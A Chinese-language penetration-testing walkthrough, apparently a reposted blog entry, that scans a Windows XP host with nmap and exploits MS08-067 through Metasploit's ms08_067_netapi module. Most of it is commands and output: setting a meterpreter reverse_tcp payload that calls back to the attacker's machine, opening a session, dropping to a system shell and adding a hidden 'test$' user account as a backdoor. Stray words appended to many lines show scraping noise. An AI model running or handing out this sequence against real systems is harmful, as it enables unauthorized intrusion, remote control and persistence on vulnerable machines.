一次真是滲透

手工進行漏洞檢查的最佳途徑之一是在metasploit中使用nmap的掃描腳本ios

root@bt:/opt/metasploit/msf3# msfconsoleshell

msf > nmap -sT -A --script=smb-check-vulns -PO 172.16.21.170windows

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-11-19 14:58 CST
Nmap scan report for 172.16.21.170
Host is up (0.00035s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft ESMTP 6.0.2600.1
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1057/tcp open msrpc Microsoft Windows RPC
1058/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
MAC Address: 00:0C:29:9F:1E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Network Distance: 1 hop
Service Info: Host: lixiuli-vcs86vr; OS: Windows; CPE: cpe:/o:microsoft:windowsapi

Host script results:
| smb-check-vulns:
| MS08-067: LIKELY VULNERABLE (host stopped responding)
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)session

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 172.16.21.170框架

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.88 secondstcp

發現|MS08-067: LIKELY VULNERABLE (host stopped responding)後,去metasploit中找可用於此漏洞的攻擊模塊ui

msf > search ms08_067   在metasploit框架中查找ms08_06 netapi攻擊模塊spa

Matching Modules
================操作系統

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption

msf > use  exploit/windows/smb/ms08_067_netapi     用use命令加載這個模塊

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp      設置攻擊載荷爲基於windows系統的meterpreter/reverse_tcp,這個載荷在攻擊成功後,會從目錄主機發起一個反彈鏈接,鏈接到lhost中指定的ip地址,這種反彈鏈接能夠讓你繞過防火牆的入站流量保護或者穿透nat網關
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets    大多數msf滲透攻擊模塊會自動對目標系統類型進行識別,而不須要手工制定此參數,可是ms08-067漏洞的攻擊中,一般沒法正確的自動識別出系統類型

Exploit targets:

Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)
4 Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
6 Windows XP SP3 English (NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)

 

msf exploit(ms08_067_netapi) > set target 2    指定操做系統類型
target => 2
msf exploit(ms08_067_netapi) > set rhost 172.16.21.170   指定目錄地址
rhost => 172.16.21.170
msf exploit(ms08_067_netapi) > set lhost 172.16.21.17    攻擊機的ip地址
lhost => 172.16.21.17
msf exploit(ms08_067_netapi) > set lport 8080    攻擊機監聽的tcp端口
lport => 8080

msf  exploit(ms08_067_netapi) > show options   查看參數是否都已經正確設置

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.21.170 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 172.16.21.17 yes The listen address
LPORT 8080 yes The listen port


Exploit target:

Id Name
-- ----
2 Windows XP SP0/SP1 Universal


msf exploit(ms08_067_netapi) > exploit  開始

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.17:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.17:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.21.170
[*] Meterpreter session 1 opened (172.16.21.17:8080 -> 172.16.21.170:1039) at 2013-11-19 15:23:40 +0800

 

exploit命令初始化攻擊環境,並對目標進行攻擊嘗試,此次攻擊時成功的。

meterpreter > pwd
C:\WINDOWS\system32

meterpreter > shell

Process 732 created.
Channel 1 created.
Microsoft Windows XP [ 5.1.2600]
(C) 1985-2001 Microsoft Corp.

C:\windows>net user test$ 123456 /add

去被攻擊機器170上看一下:

相關文章
相關標籤/搜索